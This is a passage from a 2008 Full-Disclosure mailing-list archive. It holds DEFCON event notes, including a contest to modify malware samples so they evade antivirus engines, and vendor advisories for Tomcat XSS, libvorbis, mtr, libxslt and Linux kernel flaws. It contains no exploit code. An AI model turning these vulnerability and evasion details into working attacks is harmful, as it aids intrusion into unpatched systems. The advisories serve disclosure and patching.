for Talent, DJs, and Bands has been issued by the organizers of the B&W Ball, which you may find at: https://forum.defcon.org/showthread.php?t=9266 There is also currently discussion on the DEFCON Forums about a new theme for the B&W Ball, which you can find on this thread: https://forum.defcon.org/showthread.php?t=9142 Capture the Flag Quals for this year's CTF qualifications are complete.. check out the results here: https://forum.defcon.org/forumdisplay.php?f=356 http://www.kenshoto.com/ LosT @ Con Mystery Challenge: LosT is working his devious magic again with the LosT @ Con Mystery Challenge! There is a Pre-Reg Challenge currently open, and you can find instructions at: https://forum.defcon.org/showthread.php?t=9357. http://www.mysterychallenge.org New for DEFCON 16 Buzzword Survivor: New Contest for DEFCON 16. Check out discussion of this contest as it develops at https://forum.defcon.org/forumdisplay.php?f=352 Hardware Hacking Village: To state it most simply, it's a way to give all the Defcon attendees that like electronics a place to play. It's also intended to be a place for everyone that thinks "Wow! That looks cool! I wish I knew how to do that!". It's also going to be the headquarters for Joe Grand (kingpin) so he can talk about hacking past badges and such. It should be a great place to hang out. Find more info on the forums at https://forum.defcon.org/showthread.php?t=9295. The Race to Zero: This one is generating a whole lot of buzz in the press. The Race to Zero involves contestants being given a sample set of viruses and malcode to modify and upload through the contest portal. The portal passes the modified samples through a number of antivirus engines and determines if the sample is a known threat. The first team or individual to pass their sample past all antivirus engines undetected wins that round. Each round increases in complexity as the contest progresses. Further details are available here: http://www.racetozero.net/ And let's not forget the Gringo Challenge, DEF CON B0TS, Lockpick village, a new Hardware Hacking Village, and more. Check it all out at: DEFCON Website: https://www.defcon.org/ Forums and Blogs https://forum.defcon.org/ Follow the RSS feed: https://www.defcon.org/defconrss.xml Follow the announcements before, during, and after with twitter: http://www.twitter.com/defcon16 -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.7.0 (Build 1012) Charset: us-ascii wsBVAwUBSESGfw6+AoIwjTCUAQjF5Af/YLaTeV0kTpGV4tz7Z9KV6boD/xQgHAQ/ 6ZG9xads1zn5SO+wlTq0JzNkkrjvvrxzHJHpocNzkYTEl7KTM0NqSCZM7FY2up5d pyi4D5tf474+Wt4S3W2SQW5n67dzAqKuezjIO2/Qg4BZHlf0hN1bH+e8oBk8uoQC sTlJBv7hP5TSE30TxItzaeIu6Ls2iNF+xZ1CYV1fPgEDzzT6pDpZfDaxcDr2ds5n 3dH+wa5Sm9SLhAI3LSrYSdHoTnpkaFVk5avR+vOREQ0U28IjEkh2qmbgTLv4B0yG V62xgU2Hhp/JgphFEdRiUHuOdbQI/roDDc+dMmHvs5WXBiqAumXjKQ== =EIe1 -----END PGP SIGNATURE----- From markt at apache.org Mon Jun 2 22:45:53 2008 From: markt at apache.org (Mark Thomas) Date: Mon, 02 Jun 2008 22:45:53 +0100 Subject: [Full-disclosure] [SECURITY] CVE-2008-1947: Tomcat host-manager XSS vulnerability Message-ID: <48446A11.7030702@apache.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2008-1947: Tomcat host-manager XSS vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 5.5.9 to 5.5.26 Tomcat 6.0.0 to 6.0.16 This issue has been fixed in the source repositories for each version and will be included in 5.5.27 and 6.0.17. It is anticipated that these versions will be released shortly. Description: The user supplied hostname attribute is not filtered before being included in the output. Mitigation: Do not visit untrusted sites whilst logged in to the host-manager application and log out (close the browser) once finished with the host-manager. Example: Assume that after logged in, the victim was lead to the malicious web server with following file installed. Credit: These issues were discovered by Petr Splichal of RedHat. References: http://tomcat.apache.org/security.html Mark Thomas -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkhEahEACgkQb7IeiTPGAkOQggCgirNfHSCkMDhcEzG6Ig1N0WzP qesAoKXePHeBKaB0VzeBoowW5kvZpBQx =4nQe -----END PGP SIGNATURE----- From thijs at debian.org Tue Jun 3 10:27:35 2008 From: thijs at debian.org (Thijs Kinkhorst) Date: Tue, 3 Jun 2008 11:27:35 +0200 (CEST) Subject: [Full-disclosure] [SECURITY] [DSA 1591-1] New libvorbis packages fix several vulnerabilities Message-ID: <20080603092735.7BBBC32687F@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1591-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst June 03, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : libvorbis Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2008-1419 CVE-2008-1420 CVE-2008-1423 Debian Bug : 482518 Several local (remote) vulnerabilities have been discovered in libvorbis, a library for the Vorbis general-purpose compressed audio codec. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-1419 libvorbis does not properly handle a zero value which allows remote attackers to cause a denial of service (crash or infinite loop) or trigger an integer overflow. CVE-2008-1420 Integer overflow in libvorbis allows remote attackers to execute arbitrary code via a crafted OGG file, which triggers a heap overflow. CVE-2008-1423 Integer overflow in libvorbis allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted OGG file which triggers a heap overflow. For the stable distribution (etch), these problems have been fixed in version 1.1.2.dfsg-1.4. For the unstable distribution (sid), these problems have been fixed in version 1.2.0.dfsg-3.1. We recommend that you upgrade your libvorbis package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg-1.4.dsc Size/MD5 checksum: 787 2f0bfd28fb368c43c56332e7de7a2e3d http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg.orig.tar.gz Size/MD5 checksum: 1312540 44cf09fef7f78e7c6ba7dd63b6137412 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg-1.4.diff.gz Size/MD5 checksum: 15782 62527e6adcff1dca42018a0252b19b91 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_alpha.deb Size/MD5 checksum: 94500 edb2728b48cd6fc0357f62a7dc8fca5c http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_alpha.deb Size/MD5 checksum: 110468 8273babee8a08c373671b468469b2ede http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_alpha.deb Size/MD5 checksum: 19202 925dfba3f212e8b69c760c433b119716 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_alpha.deb Size/MD5 checksum: 494958 0052fe78f4be43cb9a7f42ea2b25f7fe amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_amd64.deb Size/MD5 checksum: 17790 f49da89a8b972614687f3a5e2f6c5bac http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_amd64.deb Size/MD5 checksum: 93498 241499415b96f3e348d1ec9c66a45981 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_amd64.deb Size/MD5 checksum: 101508 63e1e8392876a822dc664e21b19e0185 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_amd64.deb Size/MD5 checksum: 468670 8c6c80eb7b8e7f8b49be1447357ebce1 arm architecture (ARM) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_arm.deb Size/MD5 checksum: 75744 03dad28341cde24fbbfd20444bf346c2 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_arm.deb Size/MD5 checksum: 18528 508cb939f65a367447c44add9dd8c11a http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_arm.deb Size/MD5 checksum: 98190 a09c2d3021f7b9d2d9b2bf04b2d30957 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_arm.deb Size/MD5 checksum: 458578 6dcadbb28c56a0a9368bfcd67b28d3fa hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_hppa.deb Size/MD5 checksum: 483196 0435784553fb2b9c08c915da58c3c7e1 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_hppa.deb Size/MD5 checksum: 21978 6ade3e3b040f8e01c4fe023df6faf2de http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_hppa.deb Size/MD5 checksum: 108084 7d263ee14d29b787b0f32710ae2bffdf http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_hppa.deb Size/MD5 checksum: 92430 72180513d203103e56e4929ca6da035f i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_i386.deb Size/MD5 checksum: 453652 55bc31f817b6806d19d8f0696cc288cd http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_i386.deb Size/MD5 checksum: 18884 5d4f1bccf5efa0d5ba5767b49f97d253 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_i386.deb Size/MD5 checksum: 75346 f11509bd2b430f8be62706a13748d6bc http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_i386.deb Size/MD5 checksum: 98176 d5b46716c8ab083b9c00b523a73a81b9 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_ia64.deb Size/MD5 checksum: 98022 dabf436427e867a81074bdca0c53ef6e http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_ia64.deb Size/MD5 checksum: 510180 1c4e1c58e7d63f10ff7efaf3a6555f46 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_ia64.deb Size/MD5 checksum: 24700 8dadf685db0738f52c4b47420eff588a http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_ia64.deb Size/MD5 checksum: 136046 b5d657cad9154915f0a9c0779e68cf1c mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_mips.deb Size/MD5 checksum: 104986 3d6d14fff3621ed344e88e7bb57ae627 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_mips.deb Size/MD5 checksum: 81588 e776156e4d5647f0aa591ea8b01d3aad http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_mips.deb Size/MD5 checksum: 20946 5f5eca06d6b715087a4298d2db944fcf http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_mips.deb Size/MD5 checksum: 479286 4a9404dab651fd387901d6eb223bd835 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_mipsel.deb Size/MD5 checksum: 76982 63638be1a06154fa1126e5be3a4ac95e http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_mipsel.deb Size/MD5 checksum: 469086 9c31f061ab04690bf52876821a9383ea http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_mipsel.deb Size/MD5 checksum: 20944 5f59636c00cbe76590ac1ef23235cd8d http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_mipsel.deb Size/MD5 checksum: 104948 be1bf5fd730d239f5cd62a92cd4b75e4 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_powerpc.deb Size/MD5 checksum: 105760 ba397af813b092de9bea72accb46db4b http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_powerpc.deb Size/MD5 checksum: 21394 7e12a198ce7bed6922d20da108e5bad5 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_powerpc.deb Size/MD5 checksum: 82558 1299949b45c3a6fdba4fa64fcf48dc53 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_powerpc.deb Size/MD5 checksum: 475206 7cda1ebdffc9b47d90efa594bea5d5b8 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_s390.deb Size/MD5 checksum: 452736 403af241544bf4fd66f4993003f0f192 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_s390.deb Size/MD5 checksum: 90546 f2f4a9e7410b946b91c4d44cef18f5af http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_s390.deb Size/MD5 checksum: 102548 ad43cb11ddff398ee0a83ded1a024321 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_s390.deb Size/MD5 checksum: 20920 7ffdc1f9962394073efae81356780428 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_sparc.deb Size/MD5 checksum: 98252 fad4afe3566e986fe819a0fff6a2376e http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_sparc.deb Size/MD5 checksum: 453410 ce3775bb59d55b9ba7e34469225e0d20 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_sparc.deb Size/MD5 checksum: 17888 4eaf8a0cfd4f3b1c6f8332ccf1bf6ef4 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_sparc.deb Size/MD5 checksum: 79796 57795226ac31a7b5bf7793e4e14dc89a These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSEUOemz0hbPcukPfAQKlCwf/RNQkhN5GiXzWbIPQDNuXCa9Gri63UI6Z yUpFdhpcitk0JKDznD67BwrVjEFOOhInCDMiVftX53oAGoUhW/kEbQ4A+gzqf9cJ B6OfyEjzV9JLEZ5OMlRQCigQpbUqQVwx6ISBM/RuzbuQSXEpYtUPztPAqHmVZDdU WjiVKEioP6T64ql9xxEu15ekuWJpcaglkHSOEGPmJZwP/9sLCQrVUwciMSWR/fr+ kdV47I292yfyhdVMnmszpncAtO1ZWAyDV8DZS2yMXlqxfK/nMadz4PWj39gISr6e 677OU3WzrE+tj7hKGvutvivwTEzNzhrHq5/oYFnQn/mgoHfgKFsNlQ== =52+x -----END PGP SIGNATURE----- From keytoaster at gentoo.org Tue Jun 3 16:40:29 2008 From: keytoaster at gentoo.org (Tobias Heinlein) Date: Tue, 03 Jun 2008 17:40:29 +0200 Subject: [Full-disclosure] [ GLSA 200806-01 ] mtr: Stack-based buffer overflow Message-ID: <484565ED.6020703@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200806-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: mtr: Stack-based buffer overflow Date: June 03, 2008 Bugs: #223017 ID: 200806-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A stack-based buffer overflow was found in mtr, possibly resulting in the execution of arbitrary code. Background ========== mtr combines the functionality of the 'traceroute' and 'ping' programs in a single network diagnostic tool. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/mtr < 0.73-r1 >= 0.73-r1 Description =========== Adam Zabrocki reported a boundary error within the split_redraw() function in the file split.c, possibly leading to a stack-based buffer overflow. Impact ====== A remote attacker could use a specially crafted resolved hostname to execute arbitrary code with root privileges. However, it is required that the attacker controls the DNS server used by the victim, and that the "-p" (or "--split") command line option is used. Workaround ========== There is no known workaround at this time. Resolution ========== All mtr users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/mtr-0.73-r1" References ========== [ 1 ] CVE-2008-2357 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2357 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200806-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080603/86b26442/attachment.bin From keytoaster at gentoo.org Tue Jun 3 16:42:11 2008 From: keytoaster at gentoo.org (Tobias Heinlein) Date: Tue, 03 Jun 2008 17:42:11 +0200 Subject: [Full-disclosure] [ GLSA 200806-02 ] libxslt: Execution of arbitrary code Message-ID: <48456653.5060309@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200806-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libxslt: Execution of arbitrary code Date: June 03, 2008 Bugs: #222499 ID: 200806-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability was found in libxslt, possibly resulting in the execution of arbitrary code and Denial of Service. Background ========== Libxslt is the XSLT C library developed for the GNOME project. XSLT itself is an XML language to define transformations for XML. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/libxslt < 1.1.24 >= 1.1.24 Description =========== Anthony de Almeida Lopes reported a vulnerability in libxslt when handling XSL style-sheet files, which could be exploited to trigger the use of uninitialized memory, e.g. in a call to "free()". Impact ====== A remote attacker could entice a user or automated system to process an XML file using a specially crafted XSL transformation file, possibly resulting in the execution of arbitrary code or a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All libxslt users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxslt-1.1.24" References ========== [ 1 ] CVE-2008-1767 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1767 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200806-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080603/da3f30e8/attachment.bin From majormal at pirate-radio.org Tue Jun 3 17:43:53 2008 From: majormal at pirate-radio.org (Major Malfunction) Date: Tue, 03 Jun 2008 17:43:53 +0100 Subject: [Full-disclosure] London DEFCON June meet - DC4420 - Thursday 5th June Message-ID: <484574C9.6030501@pirate-radio.org> hey all, it's that time of the month again! so we present to you : DC4420 June @ the Glassblower: - Wargames! The Winning team will be presenting 'how they did it' - (note:everyone should buy them Guinness. Schwag will be awarded as well) - Last-minute hastily-put-together presentation on locks. autom8ton - bring your locks/picks and we'll have a workshop afterwards. - New speaker! Alex talking about Social engineering - 5 minute slot - a demo by Richard. (demo is such a lovely term for a talk, could be anything!) - MM will be calling for participation in an "art" project. If you have camera equipment, film making skills, editing skills, music/dubbing skills, please step forward! This is going to be fun, and to do with RFID. It's entitled "PARFID: Passive Aggressive RFID. RFIDIOts fight back!". Also, please get in touch with me or alien if you would like to talk at the July meeting, June is now full :-) There will be workshops after the talks - please bring locks + picks if you have them (and are legally entitled to carry them!) :P Where? Upstairs @ Glassblower http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z=16&iwloc=addr 42 Glasshouse St, Piccadilly, W 1B 5JY doors open from 7, speaking starts from 7.30 - please try and be prompt as some people need to go early to get trains back out of London. we have private use of the whole of the upstairs till close. real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 'Doombar'. other stuff on draught : Guinness, Staropramen, Hoegaarden, Leffe. even more stuff on draught : Becks, Fosters, 1664 food menu is extensive and most importantly : they do Pie. as always, details & discussions here: http://dc4420.org cheers, MM -- "In DEFCON, we have no names..." errr... well, we do... but silly ones... From kees at ubuntu.com Tue Jun 3 20:46:32 2008 From: kees at ubuntu.com (Kees Cook) Date: Tue, 3 Jun 2008 12:46:32 -0700 Subject: [Full-disclosure] [USN-614-1] Linux kernel vulnerabilities Message-ID: <20080603194632.GL8606@outflux.net> =========================================================== Ubuntu Security Notice USN-614-1 June 03, 2008 linux vulnerabilities CVE-2007-6694, CVE-2008-1375, CVE-2008-1669, CVE-2008-1675 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: linux-image-2.6.24-18-386 2.6.24-18.32 linux-image-2.6.24-18-generic 2.6.24-18.32 linux-image-2.6.24-18-hppa32 2.6.24-18.32 linux-image-2.6.24-18-hppa64 2.6.24-18.32 linux-image-2.6.24-18-itanium 2.6.24-18.32 linux-image-2.6.24-18-lpia 2.6.24-18.32 linux-image-2.6.24-18-lpiacompat 2.6.24-18.32 linux-image-2.6.24-18-mckinley 2.6.24-18.32 linux-image-2.6.24-18-openvz 2.6.24-18.32 linux-image-2.6.24-18-powerpc 2.6.24-18.32 linux-image-2.6.24-18-powerpc-smp 2.6.24-18.32 linux-image-2.6.24-18-powerpc64-smp 2.6.24-18.32 linux-image-2.6.24-18-rt 2.6.24-18.32 linux-image-2.6.24-18-server 2.6.24-18.32 linux-image-2.6.24-18-sparc64 2.6.24-18.32 linux-image-2.6.24-18-sparc64-smp 2.6.24-18.32 linux-image-2.6.24-18-virtual 2.6.24-18.32 linux-image-2.6.24-18-xen 2.6.24-18.32 After a standard system upgrade you need to reboot your computer to effect the necessary changes. ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-386, linux-powerpc, linux-amd64-generic), a standard system upgrade will automatically perform this as well. Details follow: It was discovered that PowerPC kernels did not correctly handle reporting certain system details. By requesting a specific set of information, a local attacker could cause a system crash resulting in a denial of service. (CVE-2007-6694) A race condition was discovered between dnotify fcntl() and close() in the kernel. If a local attacker performed malicious dnotify requests, they could cause memory consumption leading to a denial of service, or possibly send arbitrary signals to any process. (CVE-2008-1375) On SMP systems, a race condition existed in fcntl(). Local attackers could perform malicious locks, causing system crashes and leading to a denial of service. (CVE-2008-1669) The tehuti network driver did not correctly handle certain IO functions. A local attacker could perform malicious requests to the driver, potentially accessing kernel memory, leading to privilege escalation or access to private system information. (CVE-2008-1675) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24_2.6.24-18.16.dsc Size/MD5: 2829 6ff5e0b70c959816641e13fd9959246b http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24_2.6.24-18.16.tar.gz Size/MD5: 1827421 6966417fafe7aa78fa6e68bb3859368a http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24_2.6.24-18.26.dsc Size/MD5: 2797 c133584e9e21bcc159c945191e7bd1c2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24_2.6.24-18.26.tar.gz Size/MD5: 10838462 481ce35c614ce65c347422f54fe8ff79 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-18.32.dsc Size/MD5: 2143 599bb1944b19765907e21a3494f59794 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-18.32.tar.gz Size/MD5: 63972921 28a40297975f2ec0a1efafae92d10a4a http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24_2.6.24.13-18.41.diff.gz Size/MD5: 117363 d93f85ef5d7a13c9f6558c53862c8542 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24_2.6.24.13-18.41.dsc Size/MD5: 2716 536d948fbf524af6dc66b3daf11f9936 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24_2.6.24.13.orig.tar.gz Size/MD5: 151339778 2b5a4eff80f5c17ca836678cd4196f3f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-18.32_all.deb Size/MD5: 4919462 06eb38a04afa658d7f7d7217186c6ffb http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18_2.6.24-18.32_all.deb Size/MD5: 8247656 ea25e7e20c04434b2e34faebf902246b http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-18.32_all.deb Size/MD5: 85818 f99ae86fb2aba79e8dd444f4025f477b http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-18.32_all.deb Size/MD5: 47435446 0658ab41111734b9daf6454d5cc69329 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-common_2.6.24.13-18.41_all.deb Size/MD5: 28194 0dade5c80b3e5b4e89800a5abe253a1f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-generic_2.6.24-18.16_amd64.deb Size/MD5: 423712 72ab6ab0e944c09355b54bb108a02e1b http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-server_2.6.24-18.16_amd64.deb Size/MD5: 423658 637b9f25972dce3ba1a267d08ed0bf25 http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-generic_2.6.24-18.16_amd64.deb Size/MD5: 2876 221da288b1e0a28407e16fa54b4a60d1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-server_2.6.24-18.16_amd64.deb Size/MD5: 2876 753bea2b029e8895988c7ae0f8f37adc http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-generic-di_2.6.24-18.16_amd64.udeb Size/MD5: 646 644303bb34437098619e25c8cafc2082 http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-generic_2.6.24-18.26_amd64.deb Size/MD5: 184542 abd225b80606502e29a9541d693372ef http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-server_2.6.24-18.26_amd64.deb Size/MD5: 184548 092a18ce530338695364fabb5961e303 http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-generic_2.6.24-18.26_amd64.deb Size/MD5: 4260576 7d5576a73d5eb210b5d88ac96a3a65f4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-server_2.6.24-18.26_amd64.deb Size/MD5: 4261796 4aad073b0a4878599e8ec105379f40ee http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-generic-di_2.6.24-18.26_amd64.udeb Size/MD5: 1048434 